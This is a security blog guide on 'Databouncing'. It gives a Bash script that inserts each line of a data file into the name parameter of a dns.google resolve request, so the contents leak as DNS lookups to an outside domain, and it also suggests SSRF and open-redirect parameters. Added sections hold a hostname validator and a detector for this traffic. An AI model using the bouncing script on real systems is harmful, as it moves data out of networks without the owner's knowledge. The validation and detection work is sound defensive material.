Surgeon Script

  • @site.url: https://databouncing.io
  • path: /surgeon-script/
  • excerpt: Working with specific parameters within web requests to Databounce
  • published date:
  • reading time: 3 minutes
  • tag: Guides
  • authors: JC

The majority of Databouncing has been focused on headers. That's good; it's the biggest and broadest example. But we wanted to extend the capability to specific requests: if you have a hostname that is processed in a parameter (think SSRF or open redirect), we can give you something to work with there. This script only sends into one position, which means that breaking the file down and rebuilding it is on you. That is something we have covered in other tools from Nick and Jakoby, but those are focused on headers. This is a starter for 10, and it's Bash. We look at using a web service, Google's DNS tools, in an HTTPS request that ultimately performs a DNS lookup on a domain of our choosing. It's supposed to do that, and that's what we take advantage of in this example.

curl --path-as-is -i -s -k -X $'GET' \
    -H $'Host: dns.google' -H $'Sec-Ch-Ua: \"Chromium\";v=\"125\", \"Not.A/Brand\";v=\"24\"' -H $'Sec-Ch-Ua-Mobile: ?0' -H $'Sec-Ch-Ua-Platform: \"macOS\"' -H $'Upgrade-Insecure-Requests: 1' -H $'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.6422.112 Safari/537.36' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7' -H $'Sec-Fetch-Site: none' -H $'Sec-Fetch-Mode: navigate' -H $'Sec-Fetch-User: ?1' -H $'Sec-Fetch-Dest: document' -H $'Accept-Encoding: gzip, deflate, br' -H $'Accept-Language: en-US,en;q=0.9' -H $'Priority: u=0, i' -H $'Connection: keep-alive' \
    $'https://dns.google/resolve?name=databouncing.io&type=txt'

Curl dns.google

curl --path-as-is -i -s -k -X $'GET' \
    -H $'Host: dns.google' -H $'Sec-Ch-Ua: \"Chromium\";v=\"125\", \"Not.A/Brand\";v=\"24\"' -H $'Sec-Ch-Ua-Mobile: ?0' -H $'Sec-Ch-Ua-Platform: \"macOS\"' -H $'Upgrade-Insecure-Requests: 1' -H $'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.6422.112 Safari/537.36' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7' -H $'Sec-Fetch-Site: none' -H $'Sec-Fetch-Mode: navigate' -H $'Sec-Fetch-User: ?1' -H $'Sec-Fetch-Dest: document' -H $'Accept-Encoding: gzip, deflate, br' -H $'Accept-Language: en-US,en;q=0.9' -H $'Priority: u=0, i' -H $'Connection: keep-alive' \
    $'https://dns.google/resolve?name=DATA_BOUNCE_HERE&type=txt'

You can now clearly see the DATA_BOUNCE_HERE marker. The rest of the work is the supporting requirements, such as ensuring each line of what is being sent in data.txt allows for a successful rebuild and is an RFC-compliant hostname.
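A check for that last requirement, as an added example that is not part of the original post or the Databouncing tools: it validates every line of a data file as an RFC 1123 hostname and renders the template for each valid line without executing anything, so the exact request a line would produce can be reviewed first. The function names (is_valid_hostname, render_template, dry_run) are this example's own; the DATA_BOUNCE_HERE marker is the post's. It goes a little beyond the post by enforcing label and total length limits, not just the character set.

```bash
#!/bin/bash
# Added example, not code from the original post: validate each candidate line
# as an RFC 1123 hostname and render the template without executing it, so the
# exact request each line would produce can be reviewed before anything is sent.
# Function names (is_valid_hostname, render_template, dry_run) are this
# example's own; the DATA_BOUNCE_HERE marker is the post's.

# Succeed (return 0) only if "$1" is a syntactically valid hostname: at most 253
# characters, dot-separated labels of 1-63 letters/digits/hyphens, no label
# starting or ending with a hyphen. Spaces, quotes, '&', ';' and friends are
# rejected, which also keeps shell metacharacters out of a template that the
# post's script later hands to eval.
is_valid_hostname() {
    local host=$1
    local label='[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?'
    local re="^${label}([.]${label})*\$"
    [ "${#host}" -ge 1 ] && [ "${#host}" -le 253 ] || return 1
    [[ $host =~ $re ]]
}

# Replace every DATA_BOUNCE_HERE in "$1" with "$2". Bash parameter expansion is
# used instead of sed's s/// so the line is inserted literally: '/' and '&' in
# it cannot terminate or alter the substitution (the quotes around $line also
# stop bash 5.2's patsub_replacement option from treating '&' specially).
render_template() {
    local template=$1 line=$2
    printf '%s\n' "${template//DATA_BOUNCE_HERE/"$line"}"
}

# Walk a file line by line. Valid lines are rendered to stdout; invalid ones are
# reported on stderr and skipped. The return value is the number of rejected
# lines (capped at 255 by the shell), so a non-zero status means the data file
# needs cleaning up before it is fed to the real script.
dry_run() {
    local template=$1 file=$2 line rejected=0
    while IFS= read -r line || [ -n "$line" ]; do
        [ -n "$line" ] || continue           # ignore blank lines
        if is_valid_hostname "$line"; then
            render_template "$template" "$line"
        else
            printf 'REJECTED (not a valid hostname): %s\n' "$line" >&2
            rejected=$((rejected + 1))
        fi
    done < "$file"
    return "$rejected"
}

# Usage: ./dry_run.sh 'curl ... name=DATA_BOUNCE_HERE ...' data.txt
if [ "$#" -eq 2 ]; then
    dry_run "$1" "$2"
fi
```

Run it with the same two arguments you would give the surgeon script; anything it rejects would otherwise have been substituted into the command and passed to eval as-is.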

Moving forward, we may introduce this individual capability into a bigger application. For now it's food for thought, and there's a lot to consider about the dexterity of Databouncing, in both its application and its value.

This pays very crude homage to the Burp Suite Pro Intruder markers; in Burp Suite it would be §DATA_BOUNCE_HERE§. We can't expect everyone to buy Burp Suite, and we're not quite ready for a full application with its features. As a side note, while we're mentioning application security related tooling, it will be interesting to see how this method ferments in the application security space, as well as the offensive space.

#!/bin/bash

# Function to check if a command exists
command_exists() {
    command -v "$1" > /dev/null 2>&1
}

# Preflight check for necessary commands (only curl: the substitution below is
# done with bash parameter expansion, so sed is no longer required)
if ! command_exists curl; then
    echo "Error: curl is not installed. Please install curl and try again." >&2
    exit 1
fi

# Check if sufficient arguments are provided
if [ "$#" -ne 2 ]; then
    echo "Usage: $0 'curl_command_template' 'file_path'" >&2
    exit 1
fi

# First argument is the cURL command template (must contain DATA_BOUNCE_HERE)
curl_command_template=$1

# Second argument is the path to the file
file_path=$2

# Check if the file exists
if [ ! -f "$file_path" ]; then
    echo "Error: File not found at $file_path" >&2
    exit 1
fi

# Refuse a template without the marker, since nothing would be substituted
case $curl_command_template in
    *DATA_BOUNCE_HERE*) ;;
    *) echo "Error: template does not contain DATA_BOUNCE_HERE" >&2; exit 1 ;;
esac

# Reading each line from the file (the `|| [ -n "$line" ]` keeps a final line
# that has no trailing newline)
while IFS= read -r line || [ -n "$line" ]
do
    # Skip blank lines
    [ -n "$line" ] || continue

    # The rendered command is passed to eval, so a line containing shell
    # metacharacters would be executed as shell. Only the characters allowed in
    # a hostname (letters, digits, '.' and '-') are accepted; anything else is
    # reported and skipped.
    case $line in
        *[!A-Za-z0-9.-]*)
            echo "Skipping line with non-hostname characters: $line" >&2
            continue
            ;;
    esac

    # Replace every placeholder with the current line. Parameter expansion is
    # used instead of sed so that '/', '&' or '\' in the line cannot break the
    # substitution; the quotes around $line keep it literal in bash 5.2 too.
    modified_curl_command=${curl_command_template//DATA_BOUNCE_HERE/"$line"}

    # Execute the cURL command
    eval "$modified_curl_command"

    # Optional: Output the status or any response
    echo "Processed line: $line"
done < "$file_path"

echo "All lines have been processed."
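The same request seen from the defending side, as an added example that is not part of the original post: given web-proxy log lines (the sample is constructed, not real traffic), it pulls the name= parameter out of requests to a DNS-over-HTTPS /resolve endpoint, groups the names by client and parent domain, and flags any client/parent pair with more distinct hostnames than a threshold, which is what a file split into hostnames looks like on the wire. The "parent = last two labels" rule is a simplification that ignores public suffixes such as co.uk, and the function names (extract_doh_names, flag_fanout, detect) are this example's own.

```bash
#!/bin/bash
# Added example, not part of the original post: the request the surgeon script
# produces, seen from the defending side. Function names are this example's own.

# Constructed sample, one request per line: "<timestamp> <client> <url>".
SAMPLE_LOG='2024-06-01T10:00:01Z 10.0.0.5 https://dns.google/resolve?name=aGVsbG8.databouncing.io&type=txt
2024-06-01T10:00:02Z 10.0.0.5 https://dns.google/resolve?name=d29ybGQ.databouncing.io&type=txt
2024-06-01T10:00:03Z 10.0.0.5 https://dns.google/resolve?name=Zm9vYmFy.databouncing.io&type=txt
2024-06-01T10:00:04Z 10.0.0.7 https://dns.google/resolve?type=a&name=example.com
2024-06-01T10:00:05Z 10.0.0.5 https://dns.google/resolve?name=YmF6.databouncing.io&type=txt
2024-06-01T10:00:06Z 10.0.0.9 https://example.org/index.html'

# Filter: print "<client> <name>" for each request whose path is /resolve and
# whose query string carries a name= parameter (in any position). Requests to
# other paths, like the last sample line, are dropped.
extract_doh_names() {
    sed -n -E 's#^[^ ]+ ([^ ]+) https?://[^/ ]+/resolve[?]([^ ]*&)?name=([^& ]+).*$#\1 \3#p'
}

# Aggregate: read "<client> <name>" lines, take the last two labels of each name
# as its parent domain (simplification: no public-suffix handling), and print
# "<client> <parent> <n>" for every client/parent pair whose number of distinct
# names exceeds the threshold. Output is sorted so it is stable.
flag_fanout() {
    local threshold=$1
    awk -v thr="$threshold" '
        {
            n = split($2, lab, ".")
            parent = (n >= 2) ? lab[n - 1] "." lab[n] : $2
            key = $1 " " parent
            if (!((key, $2) in seen)) {
                seen[key, $2] = 1
                count[key]++
            }
        }
        END {
            for (k in count)
                if (count[k] > thr) print k, count[k]
        }' | sort
}

# Run both stages over the sample; the threshold defaults to 3 distinct names.
detect() {
    printf '%s\n' "$SAMPLE_LOG" | extract_doh_names | flag_fanout "${1:-3}"
}

detect "$@"
```

On the sample, only the 10.0.0.5 / databouncing.io pair is reported (four distinct names), while the single lookup of example.com from 10.0.0.7 stays below the threshold. In a real deployment the threshold should be tuned per environment and the parent-domain rule replaced with a public-suffix list.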